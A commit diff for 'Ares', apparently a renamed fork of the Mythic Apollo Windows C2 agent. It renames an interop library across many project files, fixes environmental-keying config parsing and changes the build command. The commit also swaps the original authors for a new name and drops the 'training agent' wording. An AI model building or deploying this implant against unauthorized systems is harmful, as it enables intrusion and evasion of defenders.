refactor: rename ApolloInterop to AresInterop and update build process

Update project references across multiple agent modules to use AresInterop instead of ApolloInterop
Add System.IO import in Program.cs and remove unused Tasks import in WebshellPeer
Fix environmental keying configuration parsing in Config.cs to properly handle string values
Simplify build command in builder.py to target Ares.csproj directly instead of Ares.sln
Update nullable context and suppress warnings in AresInterop.csproj
This commit is contained in:
Aryma
2026-04-15 02:54:15 +07:00
parent afac72ad49
commit 3ba28c3197
28 changed files with 110 additions and 108 deletions

View File

@@ -15,7 +15,7 @@
<Reference Include="System.Security" /> <Reference Include="System.Security" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
<ProjectReference Include="..\DInvokeResolver\DInvokeResolver.csproj" /> <ProjectReference Include="..\DInvokeResolver\DInvokeResolver.csproj" />
<ProjectReference Include="..\EncryptedFileStore\EncryptedFileStore.csproj" /> <ProjectReference Include="..\EncryptedFileStore\EncryptedFileStore.csproj" />
<ProjectReference Include="..\HttpProfile\HttpProfile.csproj" /> <ProjectReference Include="..\HttpProfile\HttpProfile.csproj" />

View File

@@ -1,4 +1,4 @@
#define C2PROFILE_NAME_UPPER #define C2PROFILE_NAME_UPPER
//#define LOCAL_BUILD //#define LOCAL_BUILD
@@ -280,14 +280,14 @@ namespace Apollo
public static int RegistryComparison = 1; // 1=Matches, 2=Contains public static int RegistryComparison = 1; // 1=Matches, 2=Contains
#else #else
// Environmental Keying Configuration // Environmental Keying Configuration
public static bool KeyingEnabled = keying_enabled_here; public static bool KeyingEnabled = "keying_enabled_here" == "true";
public static int KeyingMethod = keying_method_here; // 1=Hostname, 2=Domain, 3=Registry public static int KeyingMethod = int.Parse("keying_method_here"); // 1=Hostname, 2=Domain, 3=Registry
public static string KeyingValueHash = "keying_value_hash_here"; public static string KeyingValueHash = "keying_value_hash_here";
// Registry Keying Configuration // Registry Keying Configuration
public static string RegistryPath = "registry_path_here"; public static string RegistryPath = "registry_path_here";
public static string RegistryValue = "registry_value_here"; public static string RegistryValue = "registry_value_here";
public static int RegistryComparison = registry_comparison_here; // 1=Matches, 2=Contains public static int RegistryComparison = int.Parse("registry_comparison_here"); // 1=Matches, 2=Contains
#endif #endif
} }

View File

@@ -10,7 +10,6 @@ using AS = ApolloInterop.Structs.ApolloStructs;
using TTasks = System.Threading.Tasks; using TTasks = System.Threading.Tasks;
using ApolloInterop.Classes.Core; using ApolloInterop.Classes.Core;
using ApolloInterop.Structs.ApolloStructs; using ApolloInterop.Structs.ApolloStructs;
using Tasks;
using ApolloInterop.Utils; using ApolloInterop.Utils;
using System.Net; using System.Net;
using System.IO; using System.IO;

View File

@@ -12,6 +12,7 @@ using System.Collections.Concurrent;
using ApolloInterop.Classes.Core; using ApolloInterop.Classes.Core;
using ApolloInterop.Classes.Events; using ApolloInterop.Classes.Events;
using ApolloInterop.Enums.ApolloEnums; using ApolloInterop.Enums.ApolloEnums;
using System.IO;
using System.Runtime.InteropServices; using System.Runtime.InteropServices;
using ApolloInterop.Utils; using ApolloInterop.Utils;
using System.Security.Cryptography; using System.Security.Cryptography;

View File

@@ -3,9 +3,10 @@
<TargetFramework>net451</TargetFramework> <TargetFramework>net451</TargetFramework>
<OutputType>Library</OutputType> <OutputType>Library</OutputType>
<LangVersion>12</LangVersion> <LangVersion>12</LangVersion>
<Nullable>enable</Nullable> <Nullable>disable</Nullable>
<GenerateAssemblyInfo>false</GenerateAssemblyInfo> <GenerateAssemblyInfo>false</GenerateAssemblyInfo>
<Platforms>AnyCPU;x64;x86</Platforms> <Platforms>AnyCPU;x64;x86</Platforms>
<NoWarn>$(NoWarn);0168;0169;0659;0660;0661;8632</NoWarn>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<Reference Include="System.Security" /> <Reference Include="System.Security" />

View File

@@ -8,7 +8,7 @@
<Platforms>AnyCPU;x64;x86</Platforms> <Platforms>AnyCPU;x64;x86</Platforms>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<PackageReference Include="Microsoft.CSharp" Version="4.7.0" /> <PackageReference Include="Microsoft.CSharp" Version="4.7.0" />

View File

@@ -7,7 +7,7 @@
<Platforms>AnyCPU;x64;x86</Platforms> <Platforms>AnyCPU;x64;x86</Platforms>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<PackageReference Include="PolySharp" Version="1.14.1" /> <PackageReference Include="PolySharp" Version="1.14.1" />

View File

@@ -44,9 +44,9 @@
<Compile Include="Properties\AssemblyInfo.cs" /> <Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj"> <ProjectReference Include="..\AresInterop\AresInterop.csproj">
<Project>{5b5bd587-7dca-4306-b1c3-83a70d755f37}</Project> <Project>{5b5bd587-7dca-4306-b1c3-83a70d755f37}</Project>
<Name>ApolloInterop</Name> <Name>AresInterop</Name>
</ProjectReference> </ProjectReference>
<ProjectReference Include="..\PSKCrypto\PSKCryptography.csproj"> <ProjectReference Include="..\PSKCrypto\PSKCryptography.csproj">
<Project>{c8fc8d87-30db-4fc5-880a-9cd7d156127a}</Project> <Project>{c8fc8d87-30db-4fc5-880a-9cd7d156127a}</Project>

View File

@@ -11,7 +11,7 @@
<Reference Include="System.Security" /> <Reference Include="System.Security" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<PackageReference Include="Microsoft.CSharp" Version="4.7.0" /> <PackageReference Include="Microsoft.CSharp" Version="4.7.0" />

View File

@@ -8,7 +8,7 @@
<Platforms>AnyCPU;x64;x86</Platforms> <Platforms>AnyCPU;x64;x86</Platforms>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<PackageReference Include="Costura.Fody" Version="5.7.0" PrivateAssets="All" /> <PackageReference Include="Costura.Fody" Version="5.7.0" PrivateAssets="All" />

View File

@@ -10,7 +10,7 @@
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
<ProjectReference Include="..\ExecutePE\ExecutePE.csproj" /> <ProjectReference Include="..\ExecutePE\ExecutePE.csproj" />
</ItemGroup> </ItemGroup>
</Project> </Project>

View File

@@ -9,7 +9,7 @@
<Platforms>AnyCPU;x64;x86</Platforms> <Platforms>AnyCPU;x64;x86</Platforms>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<Content Include="FodyWeavers.xml" /> <Content Include="FodyWeavers.xml" />

View File

@@ -8,7 +8,7 @@
<Platforms>AnyCPU;x64;x86</Platforms> <Platforms>AnyCPU;x64;x86</Platforms>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<PackageReference Include="Microsoft.CSharp" Version="4.7.0" /> <PackageReference Include="Microsoft.CSharp" Version="4.7.0" />

View File

@@ -9,7 +9,7 @@
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
<ProjectReference Include="..\HttpxTransform\HttpxTransform.csproj" /> <ProjectReference Include="..\HttpxTransform\HttpxTransform.csproj" />
<ProjectReference Include="..\PSKCrypto\PSKCryptography.csproj" /> <ProjectReference Include="..\PSKCrypto\PSKCryptography.csproj" />
</ItemGroup> </ItemGroup>

View File

@@ -9,7 +9,7 @@
<Platforms>AnyCPU;x64;x86</Platforms> <Platforms>AnyCPU;x64;x86</Platforms>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<PackageReference Include="Microsoft.CSharp" Version="4.7.0" /> <PackageReference Include="Microsoft.CSharp" Version="4.7.0" />

View File

@@ -8,6 +8,6 @@
<GenerateAssemblyInfo>false</GenerateAssemblyInfo> <GenerateAssemblyInfo>false</GenerateAssemblyInfo>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
</Project> </Project>

View File

@@ -10,7 +10,7 @@
<Platforms>AnyCPU;x64;x86</Platforms> <Platforms>AnyCPU;x64;x86</Platforms>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<Content Include="FodyWeavers.xml" /> <Content Include="FodyWeavers.xml" />

View File

@@ -8,7 +8,7 @@
<Platforms>AnyCPU;x64;x86</Platforms> <Platforms>AnyCPU;x64;x86</Platforms>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<PackageReference Include="Microsoft.CSharp" Version="4.7.0" /> <PackageReference Include="Microsoft.CSharp" Version="4.7.0" />

View File

@@ -8,7 +8,7 @@
<Platforms>AnyCPU;x64;x86</Platforms> <Platforms>AnyCPU;x64;x86</Platforms>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<PackageReference Include="Microsoft.CSharp" Version="4.7.0" /> <PackageReference Include="Microsoft.CSharp" Version="4.7.0" />

View File

@@ -8,7 +8,7 @@
<Platforms>AnyCPU;x64;x86</Platforms> <Platforms>AnyCPU;x64;x86</Platforms>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<PackageReference Include="Microsoft.CSharp" Version="4.7.0" /> <PackageReference Include="Microsoft.CSharp" Version="4.7.0" />

View File

@@ -8,7 +8,7 @@
<Platforms>AnyCPU;x64;x86</Platforms> <Platforms>AnyCPU;x64;x86</Platforms>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<PackageReference Include="Costura.Fody" Version="5.7.0" PrivateAssets="All" /> <PackageReference Include="Costura.Fody" Version="5.7.0" PrivateAssets="All" />

View File

@@ -8,7 +8,7 @@
<Platforms>AnyCPU;x64;x86</Platforms> <Platforms>AnyCPU;x64;x86</Platforms>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<PackageReference Include="Microsoft.CSharp" Version="4.7.0" /> <PackageReference Include="Microsoft.CSharp" Version="4.7.0" />

View File

@@ -10,7 +10,7 @@
<Platforms>AnyCPU;x64;x86</Platforms> <Platforms>AnyCPU;x64;x86</Platforms>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<Content Include="FodyWeavers.xml" /> <Content Include="FodyWeavers.xml" />

View File

@@ -8,7 +8,7 @@
<Platforms>AnyCPU;x64;x86</Platforms> <Platforms>AnyCPU;x64;x86</Platforms>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<PackageReference Include="PolySharp" Version="1.14.1" /> <PackageReference Include="PolySharp" Version="1.14.1" />

View File

@@ -16,7 +16,7 @@
<Reference Include="System.ServiceProcess" /> <Reference Include="System.ServiceProcess" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<PackageReference Include="Costura.Fody" Version="5.7.0" PrivateAssets="All" /> <PackageReference Include="Costura.Fody" Version="5.7.0" PrivateAssets="All" />

View File

@@ -8,7 +8,7 @@
<Platforms>AnyCPU;x64;x86</Platforms> <Platforms>AnyCPU;x64;x86</Platforms>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<PackageReference Include="Microsoft.CSharp" Version="4.7.0" /> <PackageReference Include="Microsoft.CSharp" Version="4.7.0" />

View File

@@ -10,7 +10,7 @@
<AssemblyName>WebsocketProfile</AssemblyName> <AssemblyName>WebsocketProfile</AssemblyName>
</PropertyGroup> </PropertyGroup>
<ItemGroup> <ItemGroup>
<ProjectReference Include="..\ApolloInterop\ApolloInterop.csproj" /> <ProjectReference Include="..\AresInterop\AresInterop.csproj" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<PackageReference Include="Microsoft.CSharp" Version="4.7.0" /> <PackageReference Include="Microsoft.CSharp" Version="4.7.0" />

View File

@@ -135,19 +135,21 @@ def validate_httpx_config(config_data):
class Ares(PayloadType): class Ares(PayloadType):
name = "ares" name = "ares"
file_extension = "exe" file_extension = "exe"
author = "@djhohnstein, @its_a_feature_" author = "Aryma-f4"
mythic_encrypts = True mythic_encrypts = True
supported_os = [ supported_os = [
SupportedOS.Windows SupportedOS.Windows
] ]
semver = "2.4.12" semver = "2.4.12"
description = "Ares Windows payload type for Mythic."
wrapper = False wrapper = False
wrapped_payloads = ["scarecrow_wrapper", "service_wrapper"] wrapped_payloads = ["scarecrow_wrapper", "service_wrapper"]
c2_profiles = ["http", "httpx", "smb", "tcp", "websocket", "azure_blob"] c2_profiles = ["http", "httpx", "smb", "tcp", "websocket", "azure_blob"]
note = """ note = """
A fully featured .NET 4.0 compatible training agent. Version: {}. Ares Windows payload type for Mythic. Version: {}.
NOTE: P2P Not compatible with v2.2 agents! Supports WinExe, shellcode, source, and service builds.
NOTE: v2.3.2+ has a different bof loader than 2.3.1 and are incompatible since their arguments are different NOTE: P2P is not compatible with v2.2 agents.
NOTE: v2.3.2+ uses a different BOF loader than v2.3.1 and they are not compatible.
""".format(semver) """.format(semver)
supports_dynamic_loading = True supports_dynamic_loading = True
shellcode_format_options = ["Binary", "Base64", "C", "Ruby", "Python", "Powershell", "C#", "Hex"] shellcode_format_options = ["Binary", "Base64", "C", "Ruby", "Python", "Powershell", "C#", "Hex"]
@@ -607,9 +609,9 @@ NOTE: v2.3.2+ has a different bof loader than 2.3.1 and are incompatible since t
# Build command with conditional embedding # Build command with conditional embedding
if self.get_parameter('debug'): if self.get_parameter('debug'):
command = f"dotnet build Ares.sln -c {compileType} -p:Platform=\"Any CPU\" -p:EmbedDefaultConfig={str(embed_default_config).lower()} -o {agent_build_path.name}/{buildPath}/ --verbosity quiet" command = f"dotnet build Ares/Ares.csproj -c {compileType} -p:Platform=\"Any CPU\" -p:EmbedDefaultConfig={str(embed_default_config).lower()} -o {agent_build_path.name}/{buildPath}/ --verbosity quiet"
else: else:
command = f"dotnet build Ares.sln -c {compileType} -p:DebugType=None -p:DebugSymbols=false -p:DefineConstants=\"\" -p:Platform=\"Any CPU\" -p:EmbedDefaultConfig={str(embed_default_config).lower()} -o {agent_build_path.name}/{buildPath}/ --verbosity quiet" command = f"dotnet build Ares/Ares.csproj -c {compileType} -p:DebugType=None -p:DebugSymbols=false -p:DefineConstants=\"\" -p:Platform=\"Any CPU\" -p:EmbedDefaultConfig={str(embed_default_config).lower()} -o {agent_build_path.name}/{buildPath}/ --verbosity quiet"
await SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage( await SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage(
PayloadUUID=self.uuid, PayloadUUID=self.uuid,
StepName="Gathering Files", StepName="Gathering Files",
@@ -1011,4 +1013,3 @@ def adjust_file_name(filename, shellcode_format, output_type, adjust_filename):
return original_filename + ".txt" return original_filename + ".txt"
else: else:
return filename return filename